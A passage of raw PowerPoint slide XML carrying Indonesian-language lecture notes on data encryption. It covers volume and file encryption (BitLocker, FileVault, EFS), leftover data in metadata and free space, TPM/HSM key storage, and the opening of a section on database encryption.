            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilepas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>partisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada HDD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSD. Bisa juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> array RAID. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akibatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cenderung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh firmware disk. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>longgar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk," </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> BitLocker Microsoft dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>FileVault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Apple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> volume. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kosong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> metadata file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada file individual (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada folder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Encrypting File System (EFS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diformat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NTFS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Metadata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> daftar file, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> file, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tanggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terakhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Ruang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kosong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sisa-sisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> data, di mana file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ditandai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dihapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>belum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dihapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> TPM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> HSM yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kompatibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> disk/volume/file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dikunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tersimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> TPM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> HSM.</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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8478729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Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Basis Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terstruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> baris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
